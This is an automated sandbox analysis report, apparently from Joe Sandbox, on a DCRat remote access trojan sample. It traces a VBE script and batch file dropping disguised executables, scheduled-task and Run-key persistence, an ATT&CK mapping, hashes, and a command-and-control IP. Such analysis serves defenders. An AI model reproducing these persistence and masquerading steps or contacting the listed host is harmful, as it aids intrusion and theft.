            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102AAA8 FindFirstFileExA,
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeThread delayed: delay time: 922337203685477
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeThread delayed: delay time: 922337203685477
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeAPI call chain: ExitProcess graph end node
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeFile Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeFile Volume queried: C:\ FullSizeInformation
            Source: lsass.exe, 00000014.00000002.935090036.00000000010A8000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
            Source: backgroundTaskHost.exe.7.drBinary or memory string: VmCi6Flq3E
            Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.714982029.000000001BA4A000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}[o;o
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102B710 GetProcessHeap,
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess token adjusted: Debug
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess token adjusted: Debug
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess token adjusted: Debug
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess token adjusted: Debug
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeProcess token adjusted: Debug
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102753D mov eax, dword ptr fs:[00000030h]
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeMemory allocated: page read and write | page guard
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101F063 SetUnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0102866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\refhostperfdllCommon\mbuli7h5qN.vbe"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\refhostperfdllCommon\rSX3yp.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeProcess created: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe "C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe"
            Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, refhostperfdllCommonsessionnetsvc.exe, 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, lsass.exe, 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp, lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmpBinary or memory string: Program Manager
            Source: refhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, refhostperfdllCommonsessionnetsvc.exe, 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, lsass.exe, 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, wjIuhVBtfHXnMCZlWDoj.exe, 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmp, lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: lsass.exe, 00000014.00000002.935488926.0000000001B90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeQueries volume information: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe VolumeInformation
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeQueries volume information: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe VolumeInformation
            Source: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exeQueries volume information: C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe VolumeInformation
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\lsass.exe VolumeInformation
            Source: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exeQueries volume information: C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe VolumeInformation
            Source: C:\Users\user\Pictures\Camera Roll\lsass.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\lsass.exe VolumeInformation
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: GetLocaleInfoW,GetNumberFormatW,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101ED5B cpuid
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0101D5D4 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,
            Source: C:\Users\user\Desktop\9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exeCode function: 0_2_0100ACF5 GetVersionExW,

            Stealing of Sensitive Information:

            barindex
            Yara detected DCRatShow sources
            Source: Yara matchFile source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 2936, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected DCRatShow sources
            Source: Yara matchFile source: 0000000F.00000002.743281064.0000000012CB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.753888327.0000000012461000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.727189288.0000000012551000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.713915438.0000000013171000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.732824643.0000000012DE1000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 744, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 6632, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: refhostperfdllCommonsessionnetsvc.exe PID: 5292, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 2936, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: wjIuhVBtfHXnMCZlWDoj.exe PID: 1744, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: lsass.exe PID: 1680, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsWindows Management Instrumentation11Scheduled Task/Job1Process Injection12Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsCommand and Scripting Interpreter2Registry Run Keys / Startup Folder21Scheduled Task/Job1Disable or Modify Tools1LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsScheduled Task/Job1DLL Side-Loading1Registry Run Keys / Startup Folder21Virtualization/Sandbox Evasion21Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsScripting11Logon Script (Mac)DLL Side-Loading1Process Injection12NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery37Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)DLL Side-Loading1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 553369 Sample: 9bdcc933d0c04da1fa41ba915c4... Startdate: 14/01/2022 Architecture: WINDOWS Score: 92 42 Found malware configuration 2->42 44 Antivirus detection for dropped file 2->44 46 Yara detected DCRat 2->46 48 3 other signatures 2->48 9 9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe 3 6 2->9         started        12 wjIuhVBtfHXnMCZlWDoj.exe 3 2->12         started        15 lsass.exe 14 2 2->15         started        18 5 other processes 2->18 process3 dnsIp4 38 C:\...\refhostperfdllCommonsessionnetsvc.exe, PE32 9->38 dropped 20 wscript.exe 1 9->20         started        58 Antivirus detection for dropped file 12->58 60 Machine Learning detection for dropped file 12->60 40 47.254.235.229, 49780, 80 CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC United States 15->40 file5 signatures6 process7 process8 22 cmd.exe 1 20->22         started        process9 24 refhostperfdllCommonsessionnetsvc.exe 4 11 22->24         started        28 conhost.exe 22->28         started        file10 32 C:\Windows\...\backgroundTaskHost.exe, PE32 24->32 dropped 34 C:\Users\user\Pictures\...\lsass.exe, PE32 24->34 dropped 36 C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe, PE32 24->36 dropped 50 Antivirus detection for dropped file 24->50 52 Machine Learning detection for dropped file 24->52 54 Creates multiple autostart registry keys 24->54 56 3 other signatures 24->56 30 refhostperfdllCommonsessionnetsvc.exe 2 24->30         started        signatures11 process12

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe100%Joe Sandbox ML

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe100%AviraHEUR/AGEN.1141820
            C:\Users\user\Pictures\Camera Roll\lsass.exe100%AviraHEUR/AGEN.1141820
            C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe100%AviraHEUR/AGEN.1141820
            C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe100%AviraHEUR/AGEN.1141820
            C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe100%Joe Sandbox ML
            C:\Users\user\Pictures\Camera Roll\lsass.exe100%Joe Sandbox ML
            C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe100%Joe Sandbox ML
            C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe100%Joe Sandbox ML

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            10.2.wjIuhVBtfHXnMCZlWDoj.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            7.2.refhostperfdllCommonsessionnetsvc.exe.da0000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            20.0.lsass.exe.b00000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            20.2.lsass.exe.b00000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            10.0.wjIuhVBtfHXnMCZlWDoj.exe.2b0000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            15.2.lsass.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            7.0.refhostperfdllCommonsessionnetsvc.exe.da0000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            18.2.wjIuhVBtfHXnMCZlWDoj.exe.30000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            13.2.refhostperfdllCommonsessionnetsvc.exe.980000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            13.0.refhostperfdllCommonsessionnetsvc.exe.980000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            18.0.wjIuhVBtfHXnMCZlWDoj.exe.30000.0.unpack100%AviraHEUR/AGEN.1141820Download File
            13.0.refhostperfdllCommonsessionnetsvc.exe.980000.2.unpack100%AviraHEUR/AGEN.1141820Download File
            13.0.refhostperfdllCommonsessionnetsvc.exe.980000.1.unpack100%AviraHEUR/AGEN.1141820Download File
            15.0.lsass.exe.7c0000.0.unpack100%AviraHEUR/AGEN.1141820Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://47.254.235.229x0%Avira URL Cloudsafe
            http://47.254.235.2290%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://steamcommunity.com/profiles/lsass.exe, 00000014.00000002.935822946.0000000012FB1000.00000004.00000001.sdmpfalse
              high
              http://47.254.235.229xlsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerefhostperfdllCommonsessionnetsvc.exe, 00000007.00000002.712103997.0000000003250000.00000004.00000001.sdmp, lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpfalse
                high
                http://47.254.235.229lsass.exe, 00000014.00000002.935719787.000000000305C000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                47.254.235.229
                unknownUnited States
                45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                General Information

                Joe Sandbox Version:34.0.0 Boulder Opal
                Analysis ID:553369
                Start date:14.01.2022
                Start time:19:13:38
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 10m 28s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Number of analysed new started processes analysed:28
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal92.troj.winEXE@18/12@0/1
                EGA Information:
                • Successful, ratio: 14.3%
                HDC Information:
                • Successful, ratio: 26.1% (good quality ratio 24.4%)
                • Quality average: 77.7%
                • Quality standard deviation: 29.7%
                HCA Information:
                • Successful, ratio: 62%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .exe
                Warnings:
                Show All
                • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                • Excluded IPs from analysis (whitelisted): 51.104.136.2, 40.91.112.76, 20.54.110.249
                • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                • Execution Graph export aborted for target lsass.exe, PID 1680 because it is empty
                • Execution Graph export aborted for target lsass.exe, PID 2936 because it is empty
                • Execution Graph export aborted for target refhostperfdllCommonsessionnetsvc.exe, PID 5292 because it is empty
                • Execution Graph export aborted for target refhostperfdllCommonsessionnetsvc.exe, PID 744 because it is empty
                • Execution Graph export aborted for target wjIuhVBtfHXnMCZlWDoj.exe, PID 1744 because it is empty
                • Execution Graph export aborted for target wjIuhVBtfHXnMCZlWDoj.exe, PID 6632 because it is empty
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                19:14:52Task SchedulerRun new task: wjIuhVBtfHXnMCZlWDoj path: "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
                19:14:55Task SchedulerRun new task: backgroundTaskHost path: "C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe"
                19:14:55Task SchedulerRun new task: lsass path: "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
                19:14:57AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run wjIuhVBtfHXnMCZlWDoj "C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe"
                19:15:05AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run backgroundTaskHost "C:\Windows\System32\umdmxfrm\backgroundTaskHost.exe"
                19:15:13AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run lsass "C:\Documents and Settings\user\Pictures\Camera Roll\lsass.exe"
                19:15:25API Interceptor1x Sleep call for process: lsass.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASN

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Recovery\7ab5b149089621
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:ASCII text, with very long lines, with no line terminators
                Category:dropped
                Size (bytes):943
                Entropy (8bit):5.913188613052131
                Encrypted:false
                SSDEEP:24:14lWm6wLRjn7hj5F6sXgL9grmqqVRu5IW:148wl5+vgVqVRuH
                MD5:ECF7F945361F7926B9B63C419078DDF4
                SHA1:9ECD8AEAB79A1920442CCB468451A8AB8CA560DE
                SHA-256:71A10906FD555AE5B93B9CAC9288933EF9720CCF934D425AE29200F1B2666FF2
                SHA-512:3FAAAB6EAA6683A5191DF19C5F0437C69EB7769A90DFEE0347D4DC7DD55EC1C94E8DDB0604E31D3CC7C61FBCF0D52A8AC55AA6B56DF60F14A03DC4EF1EF3C8AD
                Malicious:false
                Reputation:low
                Preview: KaS8EXIot5lUNMy5wHVoGou1rcOf3pucYXiAFuElS9kS5LlETAAelqzgpbRlImvELI5znx0BCuWHEc5f1KM3oQ1shCVodddqNgHwQvbfJ8c1UrcNfvu7a1Z4RNRlcLiiRp3hVIPFtqtqyAYzkHIstfPWHMfDezC7a3koy42XfoOtIsGQybAVD0zvahaImMl3nvQ4atBpPvMERfNYFOOCzr4jEyOQdtuSDUGWcM0EZUFRnue4TCCX8jE51q0mfvMfB3B6Z153YJmemn5TTT6brWUdQKfwVNioIkQusifcHJ9y6jTOugSMyuyoihpPVIiKk8VCWLlvyeUhXggq0RCy5WzXvlLK2PG8lyO8NR1i5gYUaQRCB8YEGtPOI8QvAa3iXV6iRiciad2Z7e6fTIJ30C21j90PBGifn06FTtucg0om1zQnBvb1QArVdF9SrNhT4XwHi1LkXqXAXPAtsMOQprOmIllOtcvTSUrdDJFJk0dkmq8NEPjf8RoNIJ86P6055EsChgqjGEqyNo9cmXJe3PUBqeV4KI4n9ioi85qij9Y4lzAeJgT1wWCptrWDLwZ8JCyo9aerrl531Za0d1uoyC0ng8zRimXxkZuiBVesBmKLbIxUQfjUBvJHLLIAlNIENITbo1zHWCmM1pMXLeADDDvzQnXzNdGydF7TzVqZqb79I7Qf8uzHNFBKWdLBd9425ytvs3hzykWlFvqTW10co8kXEw6VKo6qhEDTOexFNATnsaEkx2olJbO6NVr57LpJnqDBsWE2EvPnp7oosViRAUhF0GG2x2IBUK9CWD2axvhXMkRPqCMlnXITJ7KlQMFLmOSf8mRocIdOwJ3Pz0LupgX7Bp3Y2RJlqWv7RwREuiIe44g9D5vZAUgF0VdSs2vL81haY67DjG9HX3CHJ3V7fulV0pH5S9V1w7gCWFlH7s03UYr
                C:\Recovery\wjIuhVBtfHXnMCZlWDoj.exe
                Process:C:\refhostperfdllCommon\refhostperfdllCommonsessionnetsvc.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):1005056
                Entropy (8bit):6.304363811100068
                Encrypted:false
                SSDEEP:12288:RrC9hUiTQ4XmycIJ83QYQzC76HKtkzWkeQwwcwFWnP4q65Iqn4:ChHlmyb8uonlHQwhn/r+4
                MD5:4E66AE5C311A1AADC1241790C112525F
                SHA1:0E697DE0A696E498897118D193E4EBC854EAD1E2
                SHA-256:08D8DB67DDAE643CE598DC41C4BF56156079461A79CDB2BDB5783EB6FD804B51
                SHA-512:E10C940EB260F9B1BC305A7B0AABA7760806B4712500223D3B9920F800546B44A02D11CE9A16DA17CABD5C986C68F535CD27387A8BD4F01929061FEDFFE6B5B9
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Reputation:low
                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....].a.....................Z......n.... ... ....@.. ....................................@................................. ...K....... ............................................................................ ............... ..H............text...t.... ...................... ..`.sdata...R... ...T..................@....rsrc... ............P..............@..@.reloc...............T..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\lsass.exe.log
                Process:C:\Users\user\Pictures\Camera Roll\lsass.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.367899416177239
                Encrypted:false
                SSDEEP:24:ML9E4KrL1qE4GiD0E4KeGiKDE4KGKN08AKhPKIE4TKD1KoZAE4KKPz:MxHKn1qHGiD0HKeGiYHKGD8AoPtHTG1Q
                MD5:7115A3215A4C22EF20AB9AF4160EE8F5
                SHA1:A4CAB34355971C1FBAABECEFA91458C4936F2C24
                SHA-256:A4A689E8149166591F94A8C84E99BE744992B9E80BDB7A0713453EB6C59BBBB2
                SHA-512:2CEF2BCD284265B147ABF300A4D26AD1AAC743EFE0B47A394FB614B6843A60B9F918E56261A56334078D0D9681132F3403FB734EE66E1915CF76F29411D5CE20
                Malicious:false
                Reputation:moderate, very likely benign file
